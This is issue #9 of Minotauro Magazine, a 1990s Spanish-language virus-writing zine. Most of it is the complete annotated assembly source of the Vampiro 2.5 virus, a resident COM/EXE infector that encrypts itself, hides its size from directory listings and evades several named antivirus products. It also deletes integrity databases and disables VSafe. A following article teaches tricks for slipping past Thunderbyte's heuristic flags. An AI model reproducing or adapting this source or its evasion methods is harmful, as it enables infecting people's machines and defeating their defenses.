MINOTAURO MAGAZINE #9: Back from ultratomb ... Pensaron que desaparecimos...? No tienen tanta suerte Estuvimos inmersos en un periodo larval (del que muchos todavia no salimos) Despues de tanto tiempo de estar laburando con la revista, llegamos a una conclusion: que no se puede laburar con semejante calor, asi que a menos que juntemos comida para el invierno como los animales, (en nuestro caso el verano :) we're going to starve Ultimamente nos desviamos un poco de la escencia de la vida, los virus.... Es verdad, asi que volvere y sere millones dijo el Vampiro 2.00 Hay un tema que todo el mundo nos menciona, que porque no nos volcamos al hacking..... simplemente porque no todos nos dedicamos a eso. Como dijo trurl en una ocasion, podemos escribir sobre virus porque tenemos cierta experiencia y hace tiempo que estamos boludeando con esto, nada mas. No por eso nos vamos a tratar cada tema personalmente, pero lo que si, dejamos las puertas abiertas para que puedan ustedes mismos llenar estas paginas.... Ademas hay muchas cosas que no se podrian publicar aunque quisiesemos, como por ejemplo como clonar un celular o copiar tarjetas magneticas aunque esto ultimo es mas discutible... Quizas podemos tratarlo en forma privada en nuestros bbs pero hay una gran diferencia de eso a gritarlo a los cuatro vientos, como hicimos con la tarjeta de telefonica.... los vendedores de k1 te hacen un test psicologico antes de venderte un integrado o te preguntan si te vas a armar el "kit de telefonica" :-) Con este numero les entregamos el fuente del Vampiro 2.5a fully documented, nuevas formas de cagar el analisis heuristico del TBAV 7.00 e infeccion de ejecutables de windows entre otras cosas Se agrego a la lista de bbs que soporta nuestra mensajeria Dionysios 3 en el 451-2986 todas las noches de 23:00 a 7:00 horas La forma de validacion es igual que siempre, presenten algun virus suyo y ya esta ..... Si ya estabas validado en algun otro Dionysios sobra decir que no vas a tener problemas ONLINE +54-1-253-4389 Dionysios nodo 1 Sysops: Drako & Zarathustra ONLINE +54-1-253-2098 Dionysios nodo 2 Sysops: Drako & Zarathustra ONLINE +54-1-451-2986 Dionysios nodo 3 Sysop: Kurt ONLINE? +54-1-730-02xx Boixos Nois Sysop: Nekromancer Indice General: =============================================================================== Introduccion, Drako ....................................................... 000 Produccion Nacional: Vampiro 2.5, Drako & Zarathustra ..................... 001 Thunderbyte 7.00 Heuristics, Drako ........................................ 002 Marcando Infeccion, Gusano ................................................ 003 Metodos Antivirus, WMA .................................................... 004 Big-Yuyo, J. Von Neumann .................................................. 005 80x86 Undoc. Instructions, Drako .......................................... 006 Desensamblado del WinVir 1.4, Trurl ....................................... 07a Apendice A, Formato del NE de windoors, Trurl ............................. 07b =============================================================================== MINOTAURO MAGAZINE #9: Produccion Nacional: Vampiro 2.5 por Drako & Zarathustra digital anarchy A buen entendedor, pocas palabras. El source es el fuente ORIGINAL del virus y esta explicado hasta las manos. Decidimos publicarlo ya que desde la version 6.51 del TBAV es detectado como Vampiro, asi que no tiene sentido seguir teniendolo tirado al pedo por ahi. La fecha de activacion es bastante vieja ya, enero de 1995 asi que pueden modificarla tranquilamente. ;--- Cut here ----------------------------------------------------------------- ;============================================================================== ; Digital Anarchy Viral Development ;============================================================================== ; ; Nombre: Vampiro 2.5 ; Autor : Drako [DAN] & Zarathustra [DAN] ; Fecha : 11 de Octubre de 1994 ; Tama¤o: 1644 bytes ; ; Caracteristicas: ; ; * Infector de COM/EXE residente por m‚todo de MCB ; * Infecta al ejecutar (4bh) ; * Encripci¢n variable byte a byte con un XOR ; * Se mete en el agujero del COMMAND.COM ; * Directory Stealth (FCB & Handles) ; * Utiliza una t‚cnica para eludir un posible antivirus que implemente un ; micro virtual ; * No caga los files como el DISKCOPY.COM o XCOPY.EXE del DOS ; * Redirecciona la int 21h original a la int 18h ; * Instala su propio handler para la int 24h ; * Elude al maldito chequeo de Stealth del F-prot. Como ? Bueno, en el momento ; de restar se fija si el programa host (desde el Enviroment Block) es alg£n ; file que tenga en su path "TB" ¢ "F-" para el TBAV y F-Prot respectivamente ; Porqu‚ tambi‚n para el TBAV ? Porque si se crean los archivos de integridad ; con el virus en memoria, los crea con un tama¤o err¢neo.. ; * Cosa parecida para el Chkdsk del DOS, que tambien avisaria.. ; Cuando vea que las funciones son llamadas por alguno de estos, NO RESTA :) ; * Usa t‚cnicas anti_heur¡sticas ; * Le deshabilita los flags al Vasfe y luego los restituye ; * Borra los archivitos de checksum ("ANTI-VIR.DAT" y "CHKLIST.MS") ; * Antes de Infectar EXE's verifica que tenga overlays internos ; * Antes de Infectar COM's verifica que no sean mayores a 62k ; * No infecta ning£n archivo que est‚ en el directorio de alg£n anti_virus ; listado.. Osea, cualquier archivo que en todo su string posea un "TB" ; (de TBAV), un "F-" (del F-Prot), ¢ un "SCAN", NO SERA INFECTADO.. ; * Evade : Thunderbyte 6.23 ; F-Prot 2.13 ; Scan 116 ; Dr. Solomon 6.60 ; Vsafe ; Microsoft Antivirus (MSAV) ; (TODOS Sin marcar un solo flag) :-) ;============================================================================== ;APARENTEMENTE hay un bug en la rutina de la 4eh y 4fh, pero bueno: ; - ME CAGO EN ESE BUG, OK?!?! :-) Jajajaja. Ese es el esp¡ritu!! :-) Jajajaja ; Ahora en serio. Ya se ubico el bug, pero suena medio ilogico.. Pasan cosas ; raras unicamente cuando intercepto la 4eh.. Aparentemente tiene algun otro ; uso no documentado.. Ejemplo: Cuando se hace un DIR, tambien se ejecuta una ; 4eh. ESO ES LO QUE CAGA LA RUTINA.. No tengo idea del porque, pero es asi.. ; Lo que hago ahora es NO INTERCEPTAR la 4eh, por las dudas.. Igualmente es ; IMPOSIBLE que no le reste a un archivo por esto, ya que cuando llegue a la ; entrada de directorio de algun ARCHIVO, TUVO que haber pasado por los ; directorios relativos "." y ".." por lo menos, osea que llega con la 4fh y ; no con la 4eh! :) Ojo, en el ra¡z como no existe "." y "..", puede ser que ; al primer archivo no se le reste (en caso de que este infectado obviamente) ; Generalmente el primer archivo es el COMMAND.COM, asi que es una mierda :) ; Por eso ahora, a diferencia de la version 2.02, envez de NO INFECTAR el ; COMMAND.COM, me meto en su agujero :) (Cualquier versi¢n) ;============================================================================== .286c CODIGO SEGMENT BYTE PUBLIC 'CODE' ASSUME CS:CODIGO,DS:CODIGO,SS:CODIGO org 100h install PROC FAR start_virus: virlength_p equ (((offset end_virus - offset start_virus) + 16)/16)+1 virlength_d equ offset end_marker - offset start_virus virlength_e equ offset end_marker - offset start_marker direccion_paralelo equ 378h ;============================================================================== ;COMIENZO del codigo fijo entre infeccion e infeccion ;============================================================================== push es push ds ;====================================================================== ;Calculo del offset Beta ;====================================================================== mov bp, sp mov ah, 00h int 1ah mov bp, word ptr ss:[bp-06h] sub bp, 108h ;====================================================================== ;COMIENZO de la rutina de Desencripcion: ;Desencripto sobre la misma memoria, osea sin usar un buffer ;) ;====================================================================== mov dx, virlength_e mov cx, dx mov dl, byte ptr cs:[bp+clave] lea di, start_marker jmp short decrypt clave db 00h decrypt: xor byte ptr cs:[bp+di], dl mov ah, 19h int 21h inc di loop decrypt ;============================================================================== ;FIN del codigo fijo entre infeccion e infeccion ;============================================================================== start_marker: push cs push cs pop ds pop es ;====================================================================== ;Chequeo de PlayLoad!! ;-) Muejejeje!!! ;====================================================================== mov ah, 2ah ;<== Se ejecuta a partir de 1995 int 21h ; Los dias impares, desde las cmp cx, 1995d ; 00:00 a las 03:XX (Inclusive) jae jump_relativo_del_orto7 jmp instalar jump_relativo_del_orto7: and dl, 00000001b cmp dl, 00000001b je jump_relativo_del_orto8 jmp instalar jump_relativo_del_orto8: mov ah, 2ch int 21h cmp ch, 03h jbe playload jmp instalar playload: mov ah, 09h lea dx, mensaje+bp int 21h jmp salida int21_new_service: ;============================================================================== ;COMIENZO para la nueva rutina de la int 21h ;============================================================================== cmp ah, 0ffh jne jump_relativo_del_orto1 jmp pregunta_si_estoy_residente jump_relativo_del_orto1: xchg ah, al cmp al, 4bh xchg ah, al jne jump_relativo_del_orto5 jmp handler_4bh jump_relativo_del_orto5: cmp ah, 11h je handler_11h_12h cmp ah, 12h je handler_11h_12h cmp ah, 4fh je handler_4eh_4fh jmp fin handler_24h: mov al, 03h iret handler_11h_12h: ;====================================================================== ;COMIENZO para el handler de la 11h y 12h ;====================================================================== ;====================================================================== ;Llamo a la 21h para que me llene el FCB con los datos del file ;====================================================================== pushf call dword ptr cs:[old_int_21-100h] ;====================================================================== ;Verifico si es alg£n puto anti_virus ;====================================================================== pushf call chequear_host jnc ok_host popf iret ok_host: popf push ax push bx push es cmp al, 00h jne no_restar_fcb ;====================================================================== ;Obtengo la direccion del DTA ==> ES:BX ;====================================================================== mov ah, 2fh int 18h ;====================================================================== ;Que tipo de FCB es ? Extendido o no ? ;====================================================================== cmp byte ptr es:[bx], 0ffh jne no_es_extendido es_extendido: ;====================================================================== ;Es FCB Extendido: ;- Actualizo los offset ;====================================================================== add bx, 0007h no_es_extendido: ;====================================================================== ;Ya no es mas Extendido ;) Quedo igual que uno Com£n ;- Esta infectado ? Osea, segundos = 58 ? ;====================================================================== mov ax, word ptr es:[bx+17h] and ax, 0000000000011111b ;<== Filtro lo que quiero (segundos) cmp ax, 0000000000011101b ;<== 29 * 2 = 58 segundos jne no_restar_fcb ;====================================================================== ;Me fijo si es un COM o EXE. Para no restarle a un TXT por ejemplo ;====================================================================== cmp word ptr es:[bx+09h], 'OC' jne no_es_com cmp byte ptr es:[bx+0bh], 'M' je es_com_exe no_es_com: cmp word ptr es:[bx+09h], 'XE' jne no_restar_fcb cmp byte ptr es:[bx+0bh], 'E' jne no_restar_fcb es_com_exe: ;====================================================================== ;Modifico el campo del tama¤o del file, al correcto ;) ;====================================================================== sub word ptr es:[bx+1dh], virlength_d sbb word ptr es:[bx+1fh], 0000h no_restar_fcb: pop es pop bx pop ax iret ;====================================================================== ;FIN del handler de la 11h y 12h ;====================================================================== handler_4eh_4fh: ;====================================================================== ;COMIENZO para el handler de la 4eh y 4fh ;====================================================================== pushf call dword ptr cs:[old_int_21-100h] jc no_restar_handle ;====================================================================== ;Verifico si es alg£n puto anti_virus ;====================================================================== pushf call chequear_host jnc ok_host2 popf iret ok_host2: popf push ax push bx push es ;====================================================================== ;Obtengo la direccion del DTA ==> ES:BX ;====================================================================== mov ah, 2fh int 18h ;====================================================================== ;Esta infectado ? Osea, segundos = 58 ? ;====================================================================== mov ax, word ptr es:[bx+16h] and ax, 0000000000011111b ;<== Filtro lo que quiero (segundos) cmp ax, 0000000000011101b ;<== 29 * 2 = 58 segundos jne poping ;====================================================================== ;Me fijo si es un COM o EXE. Para no restarle a un TXT por ejemplo ;====================================================================== xor si, si shit: inc si cmp byte ptr es:[bx+si+1eh], '.' jne shit inc si cmp word ptr es:[bx+si+1eh], 'OC' jne no_es_com_DTA cmp byte ptr es:[bx+si+1eh+02h], 'M' je restar_dta no_es_com_DTA: cmp word ptr es:[bx+1eh+si], 'XE' jne poping cmp byte ptr es:[bx+si+1eh+02h], 'E' jne poping restar_dta: ;====================================================================== ;Modifico el DTA porque esta infectado ;====================================================================== sub word ptr es:[bx+1ah], virlength_d sbb word ptr es:[bx+1ch], 0000h poping: pop es pop bx pop ax no_restar_handle: ;====================================================================== ;Actualizo los flags dentro del stack, para que al hacer el IRET, no me ;cague los flags actuales ;====================================================================== mov word ptr cs:[registro-100h], ax cli sub sp, 0002h pop ax add sp, 0006h push ax sub sp, 0004h sti mov ax, word ptr cs:[registro-100h] iret ;====================================================================== ;FIN del handler de la 4eh y 4fh ;====================================================================== handler_4bh: ;====================================================================== ;COMIENZO del handler de la 4bh ;====================================================================== pushf pusha push ds push es push ds push dx ;====================================================================== ;Me fijo si es algun file del TBAV, F-PROT, ¢ SCAN (o el COMMAND.COM) ;====================================================================== push cs ;<== Porque lo necesita el procedure. pop es mov byte ptr cs:[es_command-100h], 'N' ;<== Reseteo la variable lea ax, command-100h mov bx, 0010d call chequear_anti_virus jc command_com ; Bueno, en realidad el COMMAND.COM :) lea ax, tbav-100h mov bx, 0001h call chequear_anti_virus jc maldito_anti_virus lea ax, fprot-100h ;mov bx, 0001h ;<== Viene de arriba :) call chequear_anti_virus jc maldito_anti_virus lea ax, scan-100h add bl, 02h ;<== De arriba :) call chequear_anti_virus jnc no_es_ningun_anti_virus maldito_anti_virus: pop dx pop ds jmp seguir_21h command_com: mov byte ptr cs:[es_command-100h], 'Y' no_es_ningun_anti_virus: ;====================================================================== ;Obtengo y Seteo la int 24h a mi programa ;====================================================================== mov ax, 3524h int 18h mov word ptr cs:[old_24h-100h], es mov word ptr cs:[old_24h-100h+02h], bx mov ax, 2524h push cs pop ds lea dx, handler_24h-100h int 18h ;====================================================================== ;Borrar los archivitos de checksum ;====================================================================== lea dx, chklist-100h call borrar_chk lea dx, anti_vir-100h call borrar_chk ;====================================================================== ;Desinstalo el Vsafe.. (Bah, le anulo los flags :-) ;====================================================================== xor bl, bl call change_vsafe ;====================================================================== ;Obtengo los atributos del file, los guardo y los anulo ;====================================================================== pop dx pop ds push ds push dx mov ax, 4300h int 18h mov word ptr cs:[atributos-100h], cx mov ax, 4301h xor cx, cx int 18h ;====================================================================== ;Abro el file ;====================================================================== mov ax, 3d02h int 18h ;====================================================================== ;Leo los 20h primeros bytes ;====================================================================== mov bx, ax mov ah, 3fh push cs pop ds mov cx, 0020h lea dx, buffer_tmp-100h int 18h ;====================================================================== ;Me fijo si es EXE o COM ;====================================================================== cmp byte ptr cs:[buffer_tmp-100h], 'M' jne archivo_com cmp byte ptr cs:[buffer_tmp-100h+01h], 'Z' je archivo_exe archivo_com: ;====================================================================== ;Verifico si est  infectado el COM ;====================================================================== push cs pop ds xor al, al mov dx, word ptr cs:[buffer_tmp-100h+01h] add dx, 0003h call mover_puntero mov ah, 3fh mov cx, 0002h lea dx, infeccion-100h ;<== Buffer para que no llore ;) int 18h cmp word ptr cs:[infeccion-100h], 1e06h ;<== Opcodes PUSH ES DS jne jump_relativo_del_orto4 jmp esta_infectado jump_relativo_del_orto4: ;====================================================================== ;Me fijo si tiene un tama¤o aceptable (Tam < 62000d) ;====================================================================== mov al, 02h call mover_con_xor cmp ax, 62000d jb infectar_com jmp esta_infectado archivo_exe: ;====================================================================== ;Verifico si est  infectado el EXE ;====================================================================== cmp word ptr cs:[buffer_tmp-100h+10h], 2000h je jump_relativo_del_orto2 mov al, 02h ;<== Esta solapado ? call mover_con_xor mov cx, 0512d div cx cmp word ptr cs:[buffer_tmp-100h+04h], ax jbe jump_relativo_del_orto2 jmp infectar_exe jump_relativo_del_orto2: jmp esta_infectado infectar_com: ;====================================================================== ;Obtengo la fecha del file y la guardo ;====================================================================== call get_date ;====================================================================== ;BOLUDEO CON LAS VARIABLES: ;Ahora paso el buffer_tmp a bytes_org ;(Copio lo que hay en DS:SI a ES:DI) ;====================================================================== call salvar_vars ;====================================================================== ;Muevo el puntero al final para medir el file ;====================================================================== mov al, 02h call mover_con_xor cmp byte ptr cs:[es_command-100h], 'Y' jne mover_como_corresponde sub ax, virlength_d ;<== Acomodo el puntero para que ; retroceda 1.5k en el command.. ; (Espacio MUY al pedo) ;sbb dx, 0000h ;<== En realidad no es necesario :) mov dx, ax ;<== Muevo el puntero de nuevo :) xor al, al call mover_puntero mover_como_corresponde: push ax ;<== Guardo el tama¤o del file ;============================================================================== ;COMIENZO de la rutina de encripcion ;============================================================================== ;====================================================================== ;Consigo una clave: En este caso el tama¤o del file ;) ;Y encripto con un XOR ;====================================================================== call crypt ;====================================================================== ;Escribo el Virus en el file (La parte No Encriptada y la Encriptada) ;====================================================================== call escribir_encripcion ;====================================================================== ;Me voy al principio de nuevo ;) ;====================================================================== call mover_con_xorAL00 ;====================================================================== ;BOLUDEO CON LAS VARIBLES: ;Modifico la variable del comienzo ;====================================================================== pop ax ;<== Tama¤o del file en bytes sub ax, 0003h ;<== La magia siempre presente mov word ptr cs:[bytes_infectado-100h], ax ;====================================================================== ;Escribo los 3 primeros bytes en el file ;====================================================================== mov ah, 40h mov cx, 0003h lea dx, jump-100h int 18h jmp marcar_infeccion infectar_exe: ;====================================================================== ;Obtengo la fecha del file y la guardo ;====================================================================== call get_date ;====================================================================== ;BOLUDEO CON LAS VARIABLES: ;Ahora paso el buffer_tmp a bytes_org y tambien a buffer_infectado ;(Copio lo que hay en DS:SI a ES:DI) ;====================================================================== call salvar_vars lea si, buffer_tmp-100h lea di, bytes_infectado-100h mov cx, 0020h rep movsb ;====================================================================== ;Muevo el puntero al final para medir el file ;====================================================================== mov al, 02h call mover_con_xor ;====================================================================== ;Ya que estoy calculo los nuevos datos del header: ;IP (14h del header) ;CS (16h del header) ;SS (0eh del header) ;SP (10h del header) ;====================================================================== mov cx, word ptr cs:[buffer_tmp-100h+08h] shl cx, 0004h cmp ax, cx jae jump_relativo_del_orto3 jmp esta_infectado jump_relativo_del_orto3: sub ax, cx mov cx, 10h div cx mov word ptr cs:[bytes_infectado-100h+14h], dx ;<== IP mov word ptr cs:[bytes_infectado-100h+16h], ax ;<== CS inc ax mov word ptr cs:[bytes_infectado-100h+0eh], ax ;<== SS mov word ptr cs:[bytes_infectado-100h+10h], 2000h ;<== SP ;====================================================================== ;Encripto ;====================================================================== call crypt ;====================================================================== ;Escribo el Virus en el file (La parte No Encriptada y la Encriptadada) ;====================================================================== call escribir_encripcion ;====================================================================== ;Vuelvo a medir el file ;) ;====================================================================== mov al, 02h call mover_con_xor ;====================================================================== ;Calculo el ultimo dato que necesito: ;Cantidad de paginas que mide (04h) ;Bytes usados de la ultima pagina (02h) ;====================================================================== mov cx, 512d div cx inc ax mov word ptr cs:[bytes_infectado-100h+04h], ax ;<== Paginas mov word ptr cs:[bytes_infectado-100h+02h], dx ;<== Bytes £ltima p g. ;====================================================================== ;Me voy al principio de nuevo ;) ;====================================================================== call mover_con_xorAL00 ;====================================================================== ;Escribo el nuevo header (los 20h primeros bytes) ;====================================================================== mov ah, 40h mov cx, 0020h lea dx, bytes_infectado-100h int 18h marcar_infeccion: ;====================================================================== ;Restauro la fecha y marco infeccion ;====================================================================== cmp byte ptr cs:[es_command-100h], 'Y' jne correcta erronea: call set_date or cx, 0000000000011100b ;<== Segundos err¢neos int 18h jmp esta_infectado correcta: call set_date or cx, 0000000000011101b ;<== Segundos correctos int 18h esta_infectado: ;====================================================================== ;Cierro el file ;====================================================================== mov ah, 3eh int 18h ;====================================================================== ;Pongo los atributos como estaban antes ;====================================================================== pop dx pop ds mov ax, 4301h mov cx, word ptr cs:[atributos-100h] int 18h ;====================================================================== ;Re-instalo el Vsafe.. :-(( ;) ;====================================================================== mov bl, byte ptr cs:[vsafe-100h] call change_vsafe ;====================================================================== ;Dejo la 24h como estaba antes ;====================================================================== mov ax, 2524h mov ds, word ptr cs:[old_24h-100h] mov dx, word ptr cs:[old_24h-100h+02h] int 18h seguir_21h: pop es pop ds popa popf fin: ;====================================================================== ;Le doy el control a la 21h original ;====================================================================== jmp dword ptr cs:[old_int_21-100h] pregunta_si_estoy_residente: ;====================================================================== ;Me preguntan si estoy residente. Le digo que si ;) ;====================================================================== mov ah, 0feh ;<-- le digo que si ;) iret ;============================================================================== ;FIN para la nueva rutina de la int 21h ;============================================================================== instalar: ;============================================================================== ;RUTINA DE INSTALACION DEL HANDLER DE LA INT 21h: ;Pregunto si estoy residente ;============================================================================== push 0ff00h pop ax int 21h cmp ah, 0feh je ya_esta_residente ;====================================================================== ;Copio la 21h a la 18h de manera tal que de cagar a cualquier monitor ;de actividades de una manera "anti-micro_virtual" ;====================================================================== cli push ds push es mov ax, 1200h ;<== Lo unico que importa es AL=00h mov dx, direccion_paralelo out dx, al ;<== Pongo 0 en la puerta paralela jmp $+2 ;<== I/O Delay (necesario) mov si, 21h * 4 ; Vector de la 21h mov di, 18h * 4 ; Vector de la 18h (ROM Basic) in al, dx ; AL sigue en cero, pero despista a la cbw ; (posible) m quina virtual. AH = AL => AX=0 mov ds, ax ; DS=0000h ==> Segmento de la tabla mov es, ax ; ES=0000h ==> de vectores movsw ; Copio el vector de la 21h, a la 18h movsw pop es ds sti ;====================================================================== ;FIN del bloque anti_micro_virtual ;====================================================================== ;====================================================================== ;Obtengo vectores de la int 21h ;Los guardo en una variable ;====================================================================== mov ax, 3521h int 18h mov word ptr cs:[bp+int21_offset_original], bx mov ax, es mov word ptr cs:[bp+int21_segmento_original], ax ;====================================================================== ;METODO DE MCB: ;-Obtengo el segmento y la memoria usada ;-Le resto el tamano del virus ;-Hago el Resize del Bloque (4ah) ;-Ahora Alocateo la Memoria que queda a mi Virus (48h) ;-Ahora marco ese MCB como del DOS ;-Ahora copio el virus a la memoria reservada ;====================================================================== pop ds push ds mov ax, ds dec ax mov es, ax ;<-- ES<== Segmento del MCB mov ax, word ptr es:[3] ;<-- AX<== Memoria usada por el prog. sub ax, virlength_p mov bx, ax ;<-- BX<== Nuevo Tamano para el ReSize push ds pop es mov ah, 4ah int 18h mov bx, virlength_p dec bx mov ah, 48h int 18h dec ax ;<-- AX<== Segmento del MCB de mi Virus mov es, ax mov word ptr es:[1], 8 mov word ptr es:[8], 'XX' inc ax ;<-- AX<== Inicio del Bloque de Mem. mov es, ax cld mov cx, virlength_d push cs pop ds lea si, install+bp xor di, di rep movsb ;====================================================================== ;FIN DEL METODO DE MCB ;====================================================================== ;====================================================================== ;Seteo nuevo vector de la int. 21h ;====================================================================== mov ax, 2521h push es pop ds lea dx, int21_new_service-100h int 18h ya_esta_residente: ;====================================================================== ;Es la primera vez que se ejecuta ? Si es, salgo al DOS ;====================================================================== cmp word ptr cs:[bp+bytes_org+1], '00' jne continuar salida: ;====================================================================== ;Salida al DOS ;====================================================================== pop ds ;<== Para limpiar el stack de los push pop es ; del principio. mov ah, 4ch int 21h continuar: ;====================================================================== ;Antes de darle el control, se lo tengo que dar a un COM ¢ a un EXE ? ;====================================================================== cmp byte ptr cs:[bp+bytes_org], 'M' jne control_com cmp byte ptr cs:[bp+bytes_org+01h], 'Z' je control_exe control_com: ;====================================================================== ;Le doy el control al COM ;Para esto sobreescribo los primeros 3 bytes del file con los orig. ;) ;(Copio DS:SI contra ES:DI) ;====================================================================== pop ds ;<== Para limpiar el stack de los push pop es ; del principio. push cs pop ds lea si, bp+bytes_org push cs pop es mov di, 100h mov cx, 0003h rep movsb call clear_regs mov bp, 00ffh inc bp jmp bp control_exe: ;====================================================================== ;Le doy el control al EXE ;====================================================================== pop ds pop es mov si, word ptr cs:[bp+bytes_org+14h] ;<== IP mov ax, word ptr cs:[bp+bytes_org+16h] ;<== CS mov bx, word ptr cs:[bp+bytes_org+0eh] ;<== SS mov cx, word ptr cs:[bp+bytes_org+10h] ;<== SP mov dx, es add dx, 10h ;<== DX=PSP+10h add ax, dx add bx, dx ;====================================================================== ;Acomodo la pila como estaba antes (ya relocada) ;====================================================================== cli push bx pop ss mov sp, cx sti ;====================================================================== ;Preparo el far jump al codigo original ;====================================================================== push ax push si call clear_regs ret 4 install endp ;============================================================================== ; PROCEDIMIENTOS MAS USADOS ;============================================================================== Mover_con_xorAL00: xor al, al Mover_con_xor: xor dx, dx Mover_puntero: mov ah, 42h xor cx, cx int 18h ret Escribir_encripcion: ;==================================================== ;Escribo el Virus en el file (La parte No Encriptada) ;==================================================== mov ah, 40h mov cx, virlength_d - virlength_e xor dx, dx int 18h ;============================================ ;Ahora escribo el resto (La parte Encriptada) ;============================================ mov ah, 40h mov cx, virlength_e lea dx, buffer_encriptado-100h int 18h ret ;================= ;Encripto el Virus ;================= Crypt: cmp al, 00h jne clave_ok inc al clave_ok: mov byte ptr cs:[clave-100h], al mov cx, virlength_e lea si, start_marker lea di, buffer_encriptado crypt_all: mov dl, byte ptr cs:[si-100h] xor dl, al mov byte ptr cs:[di-100h], dl inc si inc di loop crypt_all ret Borrar_Chk: mov ax, 4301h push cs pop ds xor cx, cx int 18h mov ah, 41h int 18h ret Change_Vsafe: mov ax, 0fa02h mov dx, 5945h int 18h mov byte ptr cs:[vsafe-100h], cl ret Salvar_vars: cld push cs pop ds lea si, buffer_tmp-100h push cs pop es lea di, bytes_org-100h mov cx, 0020h rep movsb ret Chequear_anti_virus: ;=========================================== ;Si es un Anti_Virus prende el Carry Flag ;Si no lo es lo apaga ;Entradas: ;DS:DX <== String Original ;ES:AX <== Variable ;BX <== Contador de caracteres a comparar ;=========================================== cld mov si, dx seguir_y_resetear: cmp byte ptr ds:[si], 00h ;<== Si es "0" Que termine je no_es_anti_vir mov di, ax mov cx, bx ;<== Actualizo el contador :) repetir_comparacion: cmpsb jne seguir_y_resetear loop repetir_comparacion cmpsb jne seguir_y_resetear stc ret no_es_anti_vir: clc ;<== Indica que no es un Antivirus ret Chequear_host: ;====================================== ;Chequeo si el host no es un anti_virus ;====================================== pusha push es push ds mov ah, 62h int 18h cld mov es, bx mov es, word ptr es:[2ch] xor di, di mov cx, 0001h busco_ceros: inc di cmp byte ptr es:[di], 00h jne busco_ceros loop busco_ceros busco_uno: inc di cmp byte ptr es:[di], 01h jne busco_uno busco_cero: inc di cmp byte ptr es:[di], 00h jne busco_cero inc di ;<== Filename del host push es ;<== En DS:DX necesito el ENVIRONMENT pop ds ;<== En ES:AX necesito la VARIABLE push cs pop es mov dx, di lea ax, tbav-100h mov bx, 0001h call chequear_anti_virus jc puto_anti_virus lea ax, fprot-100h ;mov bx, 0001h ;<== Viene de arriba :) call chequear_anti_virus jc puto_anti_virus lea ax, chkdsk-100h add bl, 04h ;<== Viene de arriba :) call chequear_anti_virus jc puto_anti_virus clc puto_anti_virus: pop ds pop es popa ret set_date: ;============================ ;Setear fecha, osea infeccion ;============================ mov ax, 5701h mov dx, word ptr cs:[fecha-100h] mov cx, word ptr cs:[fecha-100h+02h] and cx, 1111111111100000b ret get_date: ;====================== ;Obtener fecha del file ;====================== mov ax, 5700h int 18h xor di, di mov word ptr cs:[fecha-100h], dx mov word ptr cs:[fecha-100h+02h], cx ret clear_regs: ;============================= ;Me limpio todos los registros ;============================= xor ax, ax xor bx, bx xor cx, cx xor dx, dx xor si, si xor di, di xor bp, bp ret ;============================================================================== ; AREA DE DATOS ;============================================================================== old_int_21 label dword int21_offset_original dw 00h int21_segmento_original dw 00h chklist db 'CHKLIST.MS',0 anti_vir db 'ANTI-VIR.DAT',0 tbav db 'TB' fprot db 'F-' scan db 'SCAN' chkdsk db 'CHKDSK' command db 'COMMAND.COM' bytes_org db 'X00XXXXXXXXXXXXXXXXXXXXXXXXXXXXX' mensaje db 'NO NO NO!! Que hace todavia despierto?!?!', 0ah, 0dh db 'Drako & Zarathustra le OBLIGAN a dormir.', 0ah, 0dh db 'Que sea la £ltima vez, ok?!?! En caso contrario, morira.. JAJAJAJAJAJA', 0ah, 0dh db 'Vampiro 2.5 - (C) Digital Anarchy Viral Development$' jump db 'é' end_marker: bytes_infectado db 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' buffer_tmp db 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' es_command db 'N' vsafe db 00h infeccion dw 00h registro dd 00h atributos dw 00h fecha dd 00h old_24h dd 00h buffer_encriptado db 1670d dup (0) end_virus: CODIGO ENDS END INSTALL MINOTAURO MAGAZINE #9: Thunderbyte Antivirus v7.00 by Drako, digital anarchy Aparentemente un dia que la gente del TBAV no tenia nada que hacer se puso a ver que boludeces le podian agregar al TBAV. Bueh, este es el resultado... El Thunderbyte, desde la ultima nota explicando como evadirlo, se ha esmerado (ja), y en el afan de tratar de detectar por lo menos un virus, ha incorporado tecnicas que en su gran mayoria, son obsoletas y ridiculas. Esto es para los del TBAV: SAQUENLE EL ANALISIS HEURISTICO A SU PRODUCTO PORQUE NO SIRVE PARA NADA (asi btw, entran de una vez por todas al querido VSUM de patty hoffman) primera parte, flags ridiculos: ------------------------------- flag "!": Invalid Program Este flag se dispara cuando el tbsan tracea un salto fuera del rango del codigo ejecutable. No le veo la relacion con alguna actividad virosica, a menos de que hagan virus que salten a la nada o ahhhh ya se, o que se topen con algun virus herido jejeje (te salvo la campana en el goeth, gorda?) flag "h": Hidden or System File Este flag es el colmo, cuando agregaron esto debian de estar en pedo having sex with their dogs... Esto te deschava si tenes algun archivo oculto. jajaja, que miedo. No merece mas comentarios... :) flag "w": Windows or OS/2 Header Este flag es el mas importantes de todos, si ven que alguno de sus programas les dispara este flag, borrenlo inmediatamente, es peligroso :) segunda parte, flags: --------------------- flag "1": 80186+ Instructions Uds. diran, que flag estupido, detecta instrucciones solo ejecutables bajo un 80186... Pero una de esas instrucciones es un push de un inmediato, osea el famoso PUSH 0FFFFh o un PUSH OFFSET _LABEL siendo _label un label, ya que el compilador traduce el offset _label a un valor numerico FIJO de infeccion en infeccion... El detalle de este flag, es que salta unicamente cuando el codigo en cuestion esta dentro de los primeros bytes. Asi que si tienen algo que inevitablemente lo tienen que hacer de esta manera y en ese momento, haciendo un simple call/ret al final del codigo les soluciona el problema...: codigo original: VIRUS_START: ;<== Comienzo del virus PUSH 0FFFFh ;<== Pasaje de datos necesario POP AX [...] ;<== Resto del codigo del virus VIRUS_END: ;<== Fin del virus lo pueden cambiar por: VIRUS_START: CALL VIRUS_END [...] VIRUS_END: PUSH 0FFFFh POP AX RET Tambien pueden abordar el problema desde otra perspectiva, haciendo el pasaje de datos de alguna otra manera (abajo hay mas ejemplos) flag "@": Strange Instructions Este parece saltar por instrucciones "extra¤as". Con esto se refiere a instrucciones hard-coded que dificilmente pueda llegar a generar un compilador. Se refiere puntualmente a las posiblemente creadas por un virus polimorfico, armadas a mano o instrucciones sin mucho sentido logico como MOV AX, AX etc. Una buena logica de polimorfismo y listo. flag "t": Time Triggered Event Este flag no esta documentado por el TBAV, pero lo usa y lo muestra en pantalla cuando lo detecta. Lo que hace es avisar cuando encuentra eventos que se dispararian en alguna fecha en especial (payload). Realmente a la primer llamada a algun servicio de timing, avisa. No analiza en que situacion se produce la llamada.. Como en el Vampiro donde detecta llamadas a la int 1ah pero que curiosamente no son para realmente saber la fecha, sino para disimular la rutina de desencripcion... flag "U": Undocumented DOS 